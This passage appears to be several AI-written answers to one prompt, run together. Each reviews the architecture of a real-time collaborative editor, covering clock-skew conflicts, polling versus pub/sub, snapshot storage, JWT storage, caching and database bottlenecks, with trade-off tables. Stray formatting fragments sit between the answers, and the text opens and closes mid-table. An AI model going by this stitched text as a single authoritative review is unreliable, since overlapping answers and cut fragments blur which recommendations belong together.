| Edge Computing | Very High | Excellent | Varies | Very High |
The architecture has good foundational concepts but requires significant enhancements for production readiness, particularly around consistency, durability, and real-time propagation. The most critical fix is moving away from last-write-wins conflict resolution, as this will fundamentally undermine user trust in the collaborative experience.
Cache-Control: no-store headers. Cache only static assets (e.g., CSS, JS).| Issue Category | Solution | Trade-off |
|---|---|---|
| WebSocket Drop | Auto-reconnect + Redis Pub/Sub | Latency & Redis dependency |
| Database Failure | Replicas + WAL buffering | Complexity & buffering risk |
| Conflict Resolution | OT/CRDTs + Server sequencing | Implementation complexity |
| PostgreSQL Bottleneck | Sharding + Read replicas + S3 snapshots | Data retrieval complexity |
| WebSocket Limits | Dedicated WebSocket service | Cost & operational overhead |
| Stale CDN Caching | no-store for dynamic data | Increased API server load |
| JWT Security | HTTP-only cookies + short expiry | CORS complexity & refresh overhead |
| Snapshot Storage | Deltas + Versioned S3 storage | Merge logic complexity |
By addressing these issues, the system can achieve robust real-time collaboration while scaling to thousands of concurrent users.
Let's analyze this architecture systematically:
1. Timestamp-based Conflict Resolution Issues
Problem: Using client clocks creates potential race conditions due to clock drift and network latency variability. If two users edit the same content near simultaneously but clocks aren't synchronized, the actual last edit might not win.
Solution: Implement logical timestamps (Lamport clocks) or true-time servers (like Spanner). Client sends opId, server increments sequence, gives you serverOpId that enforces causality.
Trade-offs: Higher complexity, requires versioning database records
2. WebSocket Connection Management
Problem: Sticky sessions needed for WebSocket clients (same client must connect to same server). Users could lose connection during server scaling events.
Solution: Implement Pub/Sub pattern with Redis. All servers subscribe to changes, allowing any server to broadcast updates to clients.
Trade-offs: Higher infrastructure cost, adds latency for initial broadcast
3. Full Snapshot Save Bottleneck
Problem: Saving full HTML snapshots every 30 seconds under high edit frequency creates database contention.
Solution: Implement delta updates - store diffs between versions, only snapshot on major changes. Store deltas with expiry based on version frequency.
Trade-offs: Need periodic compaction of deltas to snapshots
4. Session Cache Inconsistency
Problem: JWT tokens stored in localStorage are vulnerable to XSS, leading to session hijacking.
Solution: Move JWT to httpOnly cookies with CSRF protection. Revoke tokens server-side using Redis blacklist.
Trade-offs: CORS restrictions, additional CSRF token handling
5. Database Partitioning Issues
Problem: Organization-level partitioning creates hot partitions for large organizations. Write amplification when organizations cross partition boundaries.
Solution: Shard by document ID and maintain cross-shard consistency through distributed transactions. Use eventual consistency with quorum writes.
Trade-offs: Read latency increases, requires transaction coordination overhead
6. CDN Cache Invalidation
Problem: API responses cached for 5 minutes means stale data during active collaboration.
Solution: Implement cache invalidation via WebSocket triggers or CDN PATCH API with adaptive TTLs.
Trade-offs: Increases CDN costs, requires additional tooling
7. PostgreSQL Write Contention
Problem: High-frequency document updates create write bottlenecks in PostgreSQL.
Solution: Implement append-only logs for each document, batch writes, and use replication with read replicas.
Trade-offs: More storage needed, increased complexity for data integrity
8. Document Version Rollback
Problem: Conflicts causing content loss when two clients edit same section.
Solution: Store complete document history with revert functionality, maintain author info. Implement operational transform (OT) or CRDT for true collaborative editing.
Trade-offs: Much higher storage requirements, complex conflict resolution
9. Load Balancer State
Problem: Round-robin LB doesn't consider server load or WebSocket connection count.
Solution: Switch to least-connections algorithm with health checks. Add connection pooling with connection limits per server.
Trade-offs: Higher operational complexity, need to monitor active connections
10. Recovery Scenario Race Conditions
Problem: Server failure causes lost in-memory state and reconnections.
Solution: Implement server recovery protocol with document state reconstruction, client reconnection strategy, and state reconciliation using database version.
Trade-offs: Significant complexity increase, possible data inconsistencies during recovery
The key insight is that real-time collaboration systems face fundamental tradeoffs between consistency, availability, and partition tolerance. The proposed solutions often shift complexity from one area to another, requiring careful analysis of your specific use case and scaling requirements. Would you like me to elaborate on any of these solutions or discuss alternatives?
This architecture presents several significant design concerns that would likely result in data loss, inconsistent user experiences, and scaling limitations in production environments. The most critical issues center around the conflict resolution strategy, inter-server synchronization mechanism, and database write patterns. While the high-level components (React, Node.js, PostgreSQL, Redis, WebSocket) represent sound technology choices, the implementation details—particularly the last-write-wins timestamp strategy and polling-based synchronization—introduce fundamental problems that compound at scale.
The analysis that follows identifies seventeen distinct failure modes, race conditions, and bottlenecks, categorizes them by severity, and provides concrete remediation strategies with explicit trade-off analyses. Organizations deploying this architecture should prioritize addressing the high-severity issues before any production rollout.
Problem Description: The synchronization strategy relies on client-side timestamps to resolve conflicts, assuming all client clocks are synchronized and trustworthy. This assumption is fundamentally unsound. Client devices frequently have inaccurate clocks due to timezone changes, manual adjustments, battery depletion, or network time protocol delays. When two users edit the same paragraph simultaneously, the system cannot reliably determine which change should persist because the timestamp comparison itself is unreliable.
Consider a realistic scenario: User A in New York (EST, UTC-5) edits a paragraph at their local time of 14:00:00, while User B in London (GMT, UTC+0) edits the same paragraph at their local time of 14:00:00. Due to clock drift, User A's device clock is actually 3 seconds behind real time, while User B's clock is accurate. Both changes arrive at the server within milliseconds of each other, but the timestamp comparison declares User B the winner despite User A typing first. User A's work is silently discarded, and they have no indication that their contribution was lost.
The problem escalates further with malicious actors. A user could deliberately manipulate their system clock to claim priority for any edit, enabling them to overwrite others' work consistently. There is no server-side authority establishing ground truth for edit ordering.
Proposed Solution: Operational Transformation or CRDT with Server-Authoritative Ordering
Replace the timestamp-based conflict resolution with Operational Transformation (OT) as used in Google Docs, or a Conflict-free Replicated Data Type (CRDT) approach. Both strategies establish a total ordering of operations at the server level, eliminating dependence on client clocks.
In the OT approach, each edit operation is transformed against concurrent operations to maintain document consistency. The server assigns a sequential operation ID and broadcasts transformations to all clients, ensuring all participants converge to the same document state regardless of edit timing. CRDTs achieve the same goal through mathematical guarantees, representing document state as a mergeable data structure that automatically resolves conflicts without requiring server intervention for each conflict.
The trade-off involves significant implementation complexity. OT requires careful transformation functions for every operation type and can become intricate for complex document structures. CRDTs offer stronger convergence guarantees but may impose performance overhead for large documents and can result in tombstones (deleted content markers) that must be garbage collected. Additionally, migrating existing documents to a new conflict resolution strategy requires a one-time transformation pass.
Implementation Complexity: High Performance Impact: Moderate (additional transformation/merge computation) Data Loss Risk: Eliminated Migration Effort: Significant
Problem Description: The current architecture addresses multi-server scalability by having each API server poll PostgreSQL every 2 seconds for changes. This approach introduces multiple failure modes that undermine the collaborative editing experience.
The most immediate problem is latency inconsistency. When User A on Server 1 makes a change, User B connected to Server 2 experiences a delay of up to 2 seconds before seeing that change, purely due to polling timing. User B might make their own edit during this window, believing the document is in state S when it has already progressed to state S+1. This creates the exact conflict scenario the system should prevent, but now with additional complexity because the conflict involves edits that were made against different base versions.
The polling mechanism also creates race conditions at the database level. Multiple servers polling simultaneously can create thundering herd patterns where database connections spike every 2 seconds, followed by idle periods. During high-edit-density moments, the database may struggle to process concurrent polling queries alongside write operations, potentially causing query timeouts or connection exhaustion.
Perhaps most concerning is the potential for missed updates. If PostgreSQL experiences a brief connectivity issue during a poll window, or if transaction isolation levels cause a change to be invisible during the query window, that change is simply lost from the perspective of users connected to other servers. The change exists in the database but will not be broadcast until the next poll cycle detects it, and there is no mechanism to guarantee detection.
Proposed Solution: Distributed Message Queue with Pub/Sub Architecture
Replace polling with a dedicated message distribution layer using Redis Pub/Sub or a purpose-built message broker like Apache Kafka or NATS. When Server 1 receives an edit, it immediately publishes the change to a channel specific to that document. All servers subscribed to that channel receive the update instantly and broadcast it to their connected clients.
This architecture eliminates polling latency entirely, reducing inter-server propagation from up to 2 seconds to typically tens of milliseconds. The message broker provides at-least-once delivery guarantees, ensuring changes are not lost during brief connectivity issues. Database polling can be reduced to a fallback mechanism for recovering from broker failures rather than a primary synchronization path.
The trade-offs involve operational complexity and a new failure domain. The message broker becomes a critical system component requiring monitoring, clustering for high availability, and capacity planning for message throughput. Redis Pub/Sub, while simpler to implement, does not provide message persistence by default—if a server is down when a message is published, it will miss that update entirely. Kafka or NATS JetStream offer persistence but require more sophisticated configuration and expertise.
Implementation Complexity: Moderate Performance Impact: Significantly improved latency (2 seconds → milliseconds) Data Loss Risk: Reduced with persistent messaging Operational Overhead: Added broker management
Problem Description: The architecture saves complete HTML snapshots of documents every 30 seconds, regardless of edit volume. This approach creates several scalability and data integrity issues.
Storage efficiency degrades dramatically for frequently edited documents. A document that changes every few seconds will accumulate nearly identical snapshots, each consuming full document storage space. For a 50KB document edited continuously, the system generates 100KB of storage per minute, 6MB per hour, and 144MB per day—mostly redundant data. This storage growth is unbounded, eventually creating storage capacity issues and degrading database query performance.
The snapshot approach also loses edit history granularity. When conflicts occur or when users need to review changes, the system can only offer 30-second resolution snapshots rather than per-edit history. If a document is corrupted or a destructive edit is applied, recovery requires rolling back to the previous snapshot, potentially losing up to 30 seconds of legitimate work.
Database write amplification becomes severe under load. Every 30-second interval triggers write operations for all active documents simultaneously, creating periodic write spikes that stress the database. This thundering herd pattern at the storage layer mirrors the polling thundering herd at the synchronization layer.
Proposed Solution: Operational Log with Periodic Snapshots
Implement a write-ahead log that records each edit operation individually, with periodic snapshots for recovery purposes. The operational log stores only the delta (what changed, not the full document state), dramatically reducing storage requirements. A document that changes from "Hello" to "Hello World" stores only the insertion operation, not the complete document.
The operational log serves dual purposes: it enables fine-grained conflict resolution (since the system knows the exact sequence of operations) and it provides complete edit history for auditing or rollback. Periodic snapshots—perhaps every 10 minutes or based on operation count rather than fixed time intervals—provide recovery points without the storage overhead of 30-second granularity.
The trade-off involves increased implementation complexity. The system must now track operational history, handle log compaction to prevent unbounded growth, and manage the interaction between snapshots and operational replay. For recovery scenarios, the system must load the most recent snapshot and replay all operations since that snapshot, requiring operational replay capability.
Implementation Complexity: Moderate to High Performance Impact: Reduced storage and write amplification Recovery Complexity: Increased (requires log replay) History Capability: Significantly enhanced
Problem Description: Each API server maintains independent WebSocket connections to its clients, and the load balancer uses round-robin distribution without sticky sessions. This design creates a fundamental disconnect between the load balancing strategy and the WebSocket architecture.
When a user establishes a WebSocket connection, they are routed to Server A based on round-robin at that moment. Their subsequent HTTP API requests (for document loading, user information, etc.) may be routed to Server B, Server C, or any other server due to the stateless nature of HTTP load balancing. This creates an asymmetry where the user's WebSocket connection and their HTTP API calls may be served by different servers.
The immediate operational issue is session state management. If Server A stores the user's WebSocket connection and session state, but Server B receives their HTTP API requests, Server B has no access to the user's session context without consulting a shared session store. While Redis is intended for session caching, every API request requires a Redis lookup rather than local session access, adding latency to every operation.
More critically, during server maintenance or deployment, WebSocket connections may be disrupted. Without sticky sessions, users must reconnect and may be routed to a different server, losing their connection context. If the reconnection logic does not properly handle session transfer, users may experience authentication failures or document state discontinuity.
Proposed Solution: Sticky Sessions with Session State Externalization
Configure the load balancer to use sticky sessions (also known as session affinity) for WebSocket connections. This ensures that once a user is routed to a specific server, their subsequent connections—whether WebSocket or HTTP—continue routing to that server for the duration of their session. AWS Application Load Balancer supports sticky sessions via target group settings, as do most enterprise load balancers.
Combine sticky sessions with robust session state externalization in Redis. Even with sticky sessions, server failures can occur, requiring users to be re-routed to healthy servers. By storing all session state in Redis rather than server memory, any server can resume serving any user without session loss. The session state should include authentication tokens, document open state, cursor positions, and pending operations.
The trade-offs involve reduced load balancing flexibility and increased Redis dependency. Sticky sessions can create uneven load distribution if certain servers accumulate long-lived connections while others serve only brief requests. The system becomes more dependent on Redis availability—if Redis fails, new sessions cannot be established, and existing sessions may become inaccessible if their state cannot be read.
Implementation Complexity: Low (configuration change) Performance Impact: Reduced latency for session access Availability Risk: Increased Redis dependency Load Distribution: Potentially less optimal
Problem Description: JWT tokens with 24-hour expiry stored in localStorage present multiple security vulnerabilities that could compromise user accounts and document data.
The localStorage storage mechanism is vulnerable to cross-site scripting (XSS) attacks. Any JavaScript injection vulnerability in the application—whether from a dependency, a parsing edge case, or a future feature—can be exploited to read localStorage contents. An attacker who injects malicious JavaScript can extract the JWT token and authenticate as that user for up to 24 hours. Unlike HTTP-only cookies, localStorage is accessible to JavaScript, providing no defense against XSS.
The 24-hour token lifetime without refresh tokens creates extended exposure windows. If a token is compromised, attackers have nearly a full day to exploit it before expiration. The absence of refresh tokens means users remain authenticated for the full duration without server-driven session invalidation capability. There is no mechanism to log out a specific user session remotely—if an employer needs to revoke access for a departing employee, they must wait for token expiration or implement a blocklist that adds operational complexity.
Additionally, JWT tokens contain claims that are visible to anyone who obtains the token. While the payload is encoded rather than encrypted, sensitive information in the token (user ID, organization ID, permissions) is trivially readable, creating information disclosure risk.
Proposed Solution: HTTP-Only Cookies with Refresh Token Rotation
Replace localStorage token storage with HTTP-only cookies, which are inaccessible to JavaScript and therefore immune to XSS-based token theft. Implement a refresh token rotation scheme where each authentication yields both an access token (short-lived, 15 minutes) and a refresh token (longer-lived, 7 days). When the access token expires, the client uses the refresh token to obtain a new access token, with the server invalidating the used refresh token and issuing a new one.
This architecture provides multiple security improvements. Access token compromise limits exposure to 15 minutes rather than 24 hours. Refresh token rotation enables server-side session invalidation—if a refresh token is used or appears suspicious, the server can invalidate it and require re-authentication. The server maintains a record of valid refresh tokens, enabling forced logout and session management capabilities.
The trade-offs involve implementation complexity and cookie security considerations. HTTP-only cookies are still vulnerable to cross-site request forgery (CSRF) attacks, requiring CSRF token protection. Cookie-based authentication requires careful SameSite attribute configuration and works poorly with non-browser clients. The refresh token database becomes a new critical system requiring storage, invalidation management, and potentially rate limiting.
Implementation Complexity: Moderate Security Improvement: Significant reduction in credential exposure window User Experience: Seamless re-authentication via refresh New Dependencies: Refresh token storage and management
Problem Description: The last-write-wins conflict resolution strategy creates predictable data loss scenarios when multiple users edit the same content region simultaneously. This is not an edge case—it is the normal operating mode for collaborative editing.
Consider two users, User A and User B, both editing the same paragraph. User A types "The quick brown fox" while User B types "The lazy dog". Both changes are sent via WebSocket nearly simultaneously. The server timestamps indicate User B's change arrived 50 milliseconds later. User A's change is overwritten entirely by User B's change, and User A's text is lost. User A sees their work disappear and has no indication that it was overwritten rather than rejected—they simply see their paragraph replaced with different content.
The problem compounds with more users. With three or more simultaneous editors, the last-write-wins strategy creates a lottery where only the slowest typer's contribution survives. Users who type quickly and respond to document changes are systematically penalized, while users who type slowly are rewarded with their changes persisting. This creates perverse incentives that undermine the collaborative editing experience.
Proposed Solution: Operational Transformation with Transform Functions
Implement Operational Transformation to preserve all concurrent edits rather than discarding all but one. When User A inserts "quick brown fox" and User B inserts "lazy dog" at the same position, the transformation function determines that these insertions can coexist—User A's text goes before User B's text, or vice versa, based on a deterministic ordering. Both contributions survive.
The transformation function must handle various operation types: insertions, deletions, formatting changes, and moving content. Each operation type requires a corresponding transformation function that describes how it should be adjusted when concurrent with another operation type. The server applies transformations before broadcasting, ensuring all clients receive operations in a consistent order and converge to the same document state.
The trade-offs are substantial. OT requires rigorous mathematical correctness—incorrect transformation functions can cause document corruption or divergence. The complexity increases with document features: tables, images, nested formatting, and comments each require their own transformation logic. Performance overhead exists because every operation must be transformed against concurrent operations before broadcasting. Debugging OT issues is difficult because the symptoms (incorrect text ordering, formatting loss) may appear long after the problematic operation.
Implementation Complexity: Very High Correctness Verification: Challenging Performance Overhead: Moderate User Experience: Significantly improved
Problem Description: When a user loads a document, they receive the current state from PostgreSQL. If concurrent edits are occurring, the user may load a document that is already stale by the time they establish their WebSocket connection.
The sequence unfolds as follows: User C requests document D. The HTTP request routes to Server X, which queries PostgreSQL and returns the document at version 127. User C's browser receives this document and establishes a WebSocket connection to Server Y. Between the HTTP response and WebSocket establishment, User A and User B made edits advancing the document to version 130. When User C connects via WebSocket, they receive updates for versions 128, 129, and 130, but they initially rendered version 127. If User C begins editing immediately, they are editing against an outdated base state.
This creates the "zombie document" problem where the user's local state and the server's authoritative state have diverged. Edits made by User C may be based on text that has already changed on the server. The conflict resolution mechanism will handle this, but the user experience involves visual anomalies—text jumping, formatting changes, content appearing or disappearing—as the client catches up.
Proposed Solution: Version Acknowledgment Protocol
Implement a version handshake during document loading. When the client requests a document, the response includes the current version number. The client must acknowledge this version before receiving live updates. Any updates for versions prior to the acknowledged version are discarded, while updates for versions after the acknowledged version are queued for application after the initial version is confirmed.
The server tracks the version each client has acknowledged and only broadcasts updates beyond that version. If the client acknowledges version 127, but the document is now at version 135, the server sends updates 128 through 135 in sequence, allowing the client to catch up correctly. The client should display a loading or synchronizing indicator during this catch-up process.
The trade-off involves increased protocol complexity and potential latency. The version acknowledgment adds a round-trip before real-time updates begin, slightly delaying the collaborative experience. The server must maintain per-client version state, increasing memory requirements. However, the user experience benefit—eliminating visual anomalies during document load—generally justifies this cost.
Implementation Complexity: Moderate User Experience: More consistent document state Protocol Overhead: Additional round-trip Server State: Per-client version tracking required
Problem Description: The CloudFront CDN caches API responses for 5 minutes, and PostgreSQL read replicas serve read-heavy operations. This combination creates a cache stampede scenario when a popular document's cache expires.
When the cache TTL expires for a frequently accessed document, all concurrent requests for that document bypass the cache and hit the read replicas simultaneously. If the document is particularly popular—imagine a company-wide announcement document accessed by thousands of employees—the cache expiration creates a thundering herd of database queries. Even with read replicas, the sudden query spike can overwhelm the database, causing increased latency or temporary unavailability.
The problem is compounded by the read replica architecture. If the primary database must handle writes while replicas are being stampeded, resource contention increases. The cache expiration is uniform regardless of access patterns, meaning rarely-accessed documents consume cache slots while popular documents repeatedly trigger cache misses.
Proposed Solution: Probabilistic Early Expiration with Request Coalescing
Implement probabilistic early expiration (also known as jittered TTL) where cache entries are randomly invalidated up to 20% before their nominal expiration time. This spreads cache expiration across time rather than concentrating it at fixed intervals.
Combine this with request coalescing at the API server level. When multiple requests for the same document arrive during a cache miss, the first request proceeds to the database while subsequent requests wait for that result rather than making redundant database calls. This "request coalescing" or "single-flight" pattern prevents N database queries for N concurrent requests, reducing the query to 1.
The trade-offs involve implementation complexity and potential stale data exposure. Request coalescing requires tracking in-flight requests and managing waiting clients, adding memory overhead and synchronization requirements. Probabilistic early expiration means some clients receive slightly older data, though for document content this is generally acceptable. The cache behavior becomes less predictable, which can complicate debugging.
Implementation Complexity: Moderate Database Protection: Significant improvement Latency Consistency: Improved for popular documents Staleness: Slightly increased
Problem Description: Every document change is written directly to PostgreSQL, creating a direct relationship between edit frequency and database load. This architecture cannot scale beyond the database's write throughput capacity.
PostgreSQL write throughput is limited by several factors: disk I/O for the write-ahead log, lock contention for row-level updates, index maintenance for each modified row, and connection handling for write operations. Under heavy edit load—imagine a document with 50 active collaborators all typing simultaneously—the database becomes the bottleneck. Each keystroke generates a write operation, and PostgreSQL can only process so many writes per second before latency increases.
The problem intensifies with document partitioning by organization ID. While partitioning distributes load across database instances, it does not increase overall write capacity. Organizations with highly collaborative documents will still saturate their partition's write capacity. The partitioning strategy helps with data isolation and query performance but does not address the fundamental write bottleneck.
Proposed Solution: Write Buffering with Batch Persistence
Implement a write buffer layer between WebSocket handlers and PostgreSQL. Rather than writing every change immediately, changes are accumulated in memory (or in Redis) and persisted to PostgreSQL in batches. This transforms thousands of individual writes into hundreds of batch operations, dramatically reducing database load.
The batch persistence should occur based on time intervals (every 1-2 seconds) or size thresholds (accumulating 100-500 changes), whichever occurs first. The buffer must be durability-protected—if the server crashes before persistence, buffered changes are lost. Consider using Redis with persistence enabled as the buffer, accepting that some changes may be lost during Redis failures in exchange for reduced PostgreSQL load.
The trade-offs involve latency-stability trade-offs and potential data loss windows. Changes spend time in the buffer before reaching durable storage, creating a window where server failure causes data loss. Batch persistence introduces slight delays in change visibility for users loading documents via HTTP API (though WebSocket users see changes immediately). The buffering logic adds complexity, requiring careful handling of buffer overflow, persistence failures, and concurrent edit conflicts within the buffer.
Implementation Complexity: Moderate Database Throughput: Significantly improved Data Durability: Reduced (buffered changes vulnerable) Change Latency: Slightly increased for persisted state
Problem Description: Each API server maintains WebSocket connections to its clients, and Node.js has inherent limits on concurrent connections due to memory and file descriptor constraints.
Node.js can maintain thousands of concurrent WebSocket connections, but there are practical limits. Each connection consumes memory for the WebSocket object, associated state, and buffer space. Operating systems limit file descriptors, and each WebSocket connection consumes at least one file descriptor. At high connection counts, garbage collection overhead increases as more objects exist in the heap.
The architecture's assumption that "horizontal scaling by adding more API servers" solves this problem is partially correct but introduces coordination challenges. Adding servers increases total connection capacity but also increases the complexity of inter-server communication. The current polling mechanism for change propagation becomes less adequate as server count increases—more servers mean more polling instances hitting the database.
Proposed Solution: WebSocket Gateway Layer
Introduce a dedicated WebSocket gateway layer that specializes in connection management. This gateway can be implemented using Socket.IO with Redis adapter, or a purpose-built WebSocket server like Centrifugo or Pushpin. The gateway maintains all WebSocket connections, while API servers handle business logic and database operations.
The gateway architecture provides several benefits. First, connection management is optimized at the gateway level, using efficient WebSocket implementation patterns. Second, the gateway can be scaled independently of API servers based on connection counts. Third, all clients connect through a smaller number of gateway instances, simplifying the pub/sub topology for change propagation.
The trade-offs involve additional infrastructure components and potential single points of failure. The gateway layer becomes a critical system component requiring high availability configuration. The gateway must maintain connections while API servers process logic, requiring a communication mechanism between gateway and API layers (message queue or direct RPC). Client connections must handle gateway failures, requiring reconnection logic that routes to healthy gateways.
Implementation Complexity: Moderate to High Connection Scalability: Significantly improved Infrastructure Overhead: Added gateway layer Failure Modes: New gateway failure domain
Problem Description: Redis serves as the session cache for all API servers, creating a potential contention point as session operations scale.
Session cache operations include reading session data during API requests, writing session updates (token refresh, preference changes), and session expiration processing. Under load, these operations compete for Redis resources. If Redis becomes saturated with session operations, API request latency increases, potentially cascading into timeouts and failures.
The session cache architecture also creates a dependency on Redis availability. If Redis becomes unavailable, new sessions cannot be established, and existing sessions cannot be validated. While the application might continue serving requests for users with cached session data in API server memory, any operation requiring session validation fails.
Proposed Solution: Tiered Caching with Local Memory Fallback
Implement a tiered caching strategy where API servers maintain local in-memory caches of frequently accessed session data, with Redis serving as the authoritative backend. Session reads check local cache first, reducing Redis read operations. Writes invalidate the local cache entry and update Redis asynchronously.
The local cache should use a TTL significantly shorter than the session duration (perhaps 5 minutes) to ensure eventual consistency without requiring explicit cache invalidation messages between servers. This provides resilience against brief Redis unavailability—sessions continue being valid based on local cache during Redis outages.
The trade-offs involve cache consistency and memory overhead. Local caching means slight staleness in session state (up to the local TTL), which is generally acceptable for session data. Each API server consumes memory for local session cache, though this is typically a small fraction of available RAM. The implementation requires careful cache key management and invalidation logic.
Implementation Complexity: Low to Moderate Redis Load: Reduced Availability: Improved resilience to Redis issues Consistency: Eventual rather than strong
Problem Description: Each API server maintains connections to PostgreSQL for write operations and potentially for read operations. As API servers scale horizontally, total database connections increase proportionally, eventually exhausting the PostgreSQL connection limit.
PostgreSQL has configurable connection limits (typically 100-300 connections by default, expandable but not unlimited). Each API server might maintain 10-20 database connections for connection pooling. With 20 API servers, 200-400 connections are consumed just by the application, potentially exceeding database capacity before accounting for administrative connections, replicas, and maintenance operations.
The connection exhaustion manifests as errors on API requests that require database access. Users experience failed saves, inability to load documents, or authentication failures as connections time out or are refused. The errors are intermittent and load-dependent, making them difficult to diagnose.
Proposed Solution: Connection Pooling Proxy
Introduce a connection pooling proxy (PgBouncer, PgPool-II, or Amazon RDS Proxy) between API servers and PostgreSQL. The proxy maintains a smaller pool of actual database connections and multiplexes many application connections across these connections.
PgBouncer is particularly well-suited for this architecture. It supports transaction-mode pooling (connections are returned to the pool after each transaction), minimizing connection count while maintaining application semantics. The proxy presents connection semantics identical to direct database connections—API servers connect to PgBouncer as if it were PostgreSQL.
The trade-offs involve additional infrastructure and potential latency overhead. The proxy adds a network hop and processing step for each database operation, though this overhead is typically negligible (1-2 milliseconds). The proxy becomes a single point of failure if not configured for high availability. Connection pooling modes must be carefully chosen—transaction-mode pooling works for this architecture but breaks applications that require session-level state on connections.
Implementation Complexity: Moderate (infrastructure configuration) Connection Efficiency: Significantly improved Latency: Slight increase Operational Overhead: Proxy management required
Problem Description: When WebSocket connections fail and reconnect, the frontend must resynchronize document state. The current architecture lacks explicit reconnection protocols, potentially causing state loss or inconsistency.
If a user's WebSocket connection drops temporarily (network blip, server restart, mobile handoff), they must re-establish the connection and resynchronize their document view. Without explicit reconnection logic, the frontend may display stale data, lose cursor position, or display duplicate content as changes are re-broadcast.
Proposed Solution: Explicit Reconnection Protocol with State Reconciliation
Implement a reconnection handshake where the client provides its last known document version upon reconnecting. The server responds with changes since that version, enabling the client to catch up efficiently. The client should also store recent pending operations locally (localStorage or IndexedDB) and retransmit them on reconnection if the server indicates they were not processed.
The trade-off involves frontend complexity and storage requirements. The reconnection logic must handle various failure scenarios: server restart (no state preserved), network partition (client state may be ahead or behind), and concurrent edits during disconnection. Local storage of pending operations adds code complexity but significantly improves user experience during connection failures.
Problem Description: The architecture lacks explicit monitoring, alerting, and observability components. Without visibility into system health, operators cannot detect failures, performance degradation, or security incidents.
Critical metrics that are not captured include WebSocket connection counts per server, change propagation latency between servers, database query latency distributions, cache hit rates, error rates by endpoint, and authentication failure rates. Without these metrics, the system operates in a visibility vacuum where problems are discovered only through user reports.
Proposed Solution: Comprehensive Observability Pipeline
Implement structured logging, metrics collection, and distributed tracing. Each API request and WebSocket operation should generate logs with correlation IDs enabling request tracing across services. Metrics should be collected for all operational components and aggregated for alerting.
The trade-off is operational investment rather than technical complexity. The observability pipeline requires logging infrastructure (Elasticsearch, Splunk, or cloud equivalent), metrics storage (Prometheus, Datadog, or cloud equivalent), and dashboards for visualization. Alerting rules must be defined and tuned to avoid alert fatigue while catching genuine issues.
The following table summarizes all identified issues with their severity, proposed solutions, and key trade-offs:
| Issue | Severity | Solution | Primary Trade-off |
|---|---|---|---|
| Clock Skew Destruction | Critical | OT/CRDT with Server Ordering | Implementation Complexity |
| Inter-Server Polling | Critical | Pub/Sub Message Broker | Operational Overhead |
| Full Snapshot Persistence | High | Operational Log + Snapshots | Recovery Complexity |
| WebSocket Fragmentation | High | Sticky Sessions + External State | Reduced LB Flexibility |
| JWT Vulnerabilities | High | HTTP-Only Cookies + Refresh Tokens | CSRF Vulnerability |
| Concurrent Edit Loss | High | Operational Transformation | Correctness Verification |
| Document Load Inconsistency | Medium | Version Acknowledgment Protocol | Additional Round-Trip |
| Cache Stampede | Medium | Early Expiration + Coalescing | Slightly Stale Data |
| Write Throughput Limits | High | Write Buffering with Batching | Data Loss Window |
| Connection Density | Medium | Dedicated WebSocket Gateway | Infrastructure Overhead |
| Redis Contention | Medium | Tiered Caching | Eventual Consistency |
| Connection Pool Exhaustion | Medium | Connection Pooling Proxy | Single Point of Failure |
Organizations should address issues in the following order for maximum risk reduction:
Phase 1 (Immediate): Implement HTTP-only cookies with refresh tokens to address JWT vulnerabilities. This provides significant security improvement with moderate implementation effort and no architectural changes.
Phase 2 (High Priority): Replace polling with Redis Pub/Sub for inter-server synchronization. This eliminates the 2-second latency window and removes a significant race condition, though it requires Redis infrastructure changes.
Phase 3 (Critical): Implement Operational Transformation for conflict resolution. This is the most complex change but addresses the fundamental data loss issue inherent in last-write-wins. Consider using an existing CRDT library to reduce implementation burden.
Phase 4 (Scalability): Implement write buffering and connection pooling to address database bottlenecks. These changes enable horizontal scaling beyond the current architecture's limits.
Phase 5 (Resilience): Add reconnection protocols, observability, and WebSocket gateway architecture for production resilience.
The architecture can operate with Phase 1 and Phase 2 implemented while Phase 3 is in development, providing meaningful improvement while the comprehensive solution is developed. Phases should not be skipped entirely—operating with known vulnerabilities (particularly the JWT issues) is inappropriate for any production system handling sensitive documents.
private, no-cache for private data; use a separate API endpoint for real-time data via WebSocket.| Issue | Solution | Trade-offs |
|---|---|---|
| Cross-server broadcast | Pub/Sub message broker | Added latency, complexity |
| Conflict resolution | CRDT/OT | Implementation complexity, overhead |
| Write bottleneck | Buffered batch writes | Data loss risk, latency |
| Polling | Event-driven notifications | PostgreSQL-specific, scaling |
| CDN caching | Private cache headers | Reduced caching benefits |
| JWT expiry | Refresh tokens | Security and complexity |
| Read replica lag | WebSocket initial load | Latency |
| Partitioning | Consistent hashing | Rebalancing complexity |
| Reconnection | Sticky sessions/distributed cache | Uneven load, latency |
| Snapshots | Incremental operations + compaction | Recovery complexity |
| Redis failure | Redis Sentinel/Cluster | Cost, fallback security |
| XSS | HttpOnly cookies | HTTPS requirement |
| Load balancer | Sticky sessions | Uneven load |
| Race conditions | Database locking | Throughput reduction |
| Message ordering | Sequence numbers | Overhead |
These issues highlight the complexity of building a real-time collaborative editor at scale. While the proposed solutions address specific problems, they often introduce trade-offs in consistency, latency, complexity, or cost. A thorough evaluation of user experience requirements and system constraints is essential when deciding which improvements to implement.
Your architecture contains fundamental design issues that will cause data loss, inconsistency, and scaling failures under real-world conditions. Let me systematically enumerate each problem with concrete solutions and trade-offs.
Problem:
User A (clock: 10:00:00.000) → Types "Hello" → timestamp: 10:00:00.000
User B (clock: 09:59:59.500, 500ms behind) → Types "World" → timestamp: 09:59:59.500
User B typed after User A, but their timestamp is earlier. Last-write-wins produces "WorldHello" instead of "HelloWorld". Client clock skew is endemic—laptops with incorrect time, timezone changes, OS clock adjustments.
Failure Mode:
Solutions:
| Solution | Mechanism | Trade-offs |
|---|---|---|
| Server-assigned sequence numbers | Each mutation gets a monotonically increasing integer from the server | Single point of contention; throughput limited to server's sequencing capacity |
| Hybrid Logical Clocks (HLC) | Combines physical time with logical counters; guarantees causal ordering | Additional complexity in implementation; HLC can drift from wall-clock time |
| Operational Transformation (OT) | Transform operations against each other to maintain intent | Exponential complexity in OT proofs; notoriously difficult to implement correctly |
| CRDTs (Conflict-free Replicated Data Types) | Mathematically proven eventual consistency; no coordination needed | Memory overhead; limited to certain data structures; doesn't preserve document order naturally without additional work |
Recommendation: Use CRDTs (Yjs or Automerge) for character-level merging. Avoid homegrown conflict resolution.
Problem:
Server 1 polls at T=0.000 → Gets change C1
Server 2 polls at T=0.100 → Gets change C1
Server 1 broadcasts C1 to its clients
Server 2 broadcasts C1 to its clients
If Server 1 and Server 2 both serve the same document, clients receive duplicate broadcasts. Worse, if Server 2's poll occurs during Server 1's broadcast, clients on Server 2 might see C1 twice—or miss it entirely if ordering is imperfect.
Failure Mode:
Solutions:
| Solution | Mechanism | Trade-offs |
